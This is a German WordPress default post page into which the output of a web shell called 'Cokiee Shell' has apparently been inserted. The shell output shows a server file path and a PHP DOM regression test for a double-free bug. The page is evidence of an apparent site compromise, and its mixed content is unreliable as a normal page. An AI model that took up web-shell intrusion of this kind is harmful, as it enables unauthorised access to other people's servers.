Willkommen bei WordPress. Dies ist dein erster Beitrag. Bearbeite oder lösche ihn und beginne mit dem Schreiben!
Hallo Welt!
von raredesign | Dez 3, 2019 | Allgemein | 0 Kommentare
Cokiee Shell
Current Path : /usr/local/src/php7/php-7.0.5/ext/dom/tests/ |
Current File : //usr/local/src/php7/php-7.0.5/ext/dom/tests/bug45251.phpt |
--TEST-- Bug #45251 (double free or corruption with setAttributeNode()) --SKIPIF-- <?php require_once('skipif.inc'); ?> --FILE-- <?php $doc = new DOMDocument; $doc->loadXml(<<<EOF <?xml version="1.0" encoding="utf-8" ?> <aaa> <bbb foo="bar"/> </aaa> EOF ); $xpath = new DOMXPath($doc); $bbb = $xpath->query('bbb', $doc->documentElement)->item(0); $ccc = $doc->createElement('ccc'); foreach ($bbb->attributes as $attr) { $ccc->setAttributeNode($attr); } echo $attr->parentNode->localName; ?> --EXPECT-- ccc
Cokiee Shell Web 1.0, Coded By Razor
Neueste Kommentare